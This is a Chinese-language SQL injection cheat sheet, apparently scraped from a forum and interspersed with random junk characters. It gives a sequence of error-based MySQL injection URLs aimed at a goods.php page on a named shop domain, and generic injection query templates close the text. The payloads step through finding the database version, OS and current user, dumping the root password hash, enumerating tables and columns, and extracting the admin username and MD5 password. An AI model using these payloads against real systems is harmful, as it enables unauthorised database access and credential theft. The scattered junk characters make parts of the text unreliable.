判断版本号
, s7 r5 ~& p8 _% i# q+ thttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
& c4 [* Q( b! ~& P
3 Y& \7 W4 R; \7 ^判断系统2 ]8 \% v3 `1 n, L* T4 c* n: v
# g+ O1 w5 \% n' V- E
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% W' J' F) f2 l' A% Q/ R2 p
, d: V% n0 R9 c3 D8 g$ V q
$ C" M8 l& c2 [( o2 p( |3 c
6 O8 S4 Q% G3 p, V* E# B当前 user()
( k1 y) h7 h( k+ }1 z3 A
; y/ U: Y# `- V8 w# V5 n" _http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23, @# j4 W" T4 |; d5 Y7 W
$ K$ N9 u- C7 d
' y0 w3 m( I# d3 z( H; z
6 s* k; I. ]: C8 F+ v o
当前 database()
4 f# H5 v7 |# v& w) |/ qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 o1 }1 Y, R$ u$ p6 Z; @& P; S6 S; Z5 o+ d, f& C
4 X: T4 r6 E9 g7 A4 Z
1 U! p/ s3 j4 P4 v1 Y% U) v" z. Y- B$ I6 _
root hash) m4 K* n# d6 S/ D( Q
5 g" S3 r1 r, w0 Hhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23- j# G Q4 r' I, p8 B
) B0 \( n- r* \( Q' H# \. w6 n% c: W1 Y. G% L
( S4 q- ^, ]1 {3 V当前 数据库表名
& I6 R' H$ ~0 B* Q. }* O5 ]$ U2 h) ^( Z- J1 V
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 s# e' u9 _' L: |' p* L) I( O
6 I: e. [. P$ U8 b5 g8 O* M
1 X6 {4 x: z: F. i2 ^9 d) g
: j% ~) H& W& x% h7 A
当前 数据库 user_name 字段
& R+ v4 e' q) k
& e* v3 L+ n, i% j a# J% F/ Fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
, O6 E1 \, z' r" C+ z
2 r3 i& R/ ~+ ]当前 数据库 字段 password
3 J8 `7 [ p, lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
) b( w# b8 y ?! W5 l6 `# ?+ @' ~
2 ]: Y8 `' I' X8 N$ u# @
0 x# e9 p7 E9 X0 _$ N6 K2 m4 p! \( ?2 l" R
获得 admin passwd(md5)
+ c6 ]- o" u" V1 ^! Q3 @6 ]; L1 ~5 W) ^: C/ Z8 J5 u
, d5 N( x/ V6 `0 x! d3 zhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23$ n# _ B: [8 B# d q# t4 y. w
! P( _% }& s4 ]4 V S
报错注射: j% x8 g1 ` o9 P' V
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)& g. p- S* O, S0 ~/ ?, D
& ^( B0 X! ]* o+ NSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)" r* q9 Q( v! h6 ?. p, ?0 E
l0 x9 M2 n" n4 y' x! [8 k
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |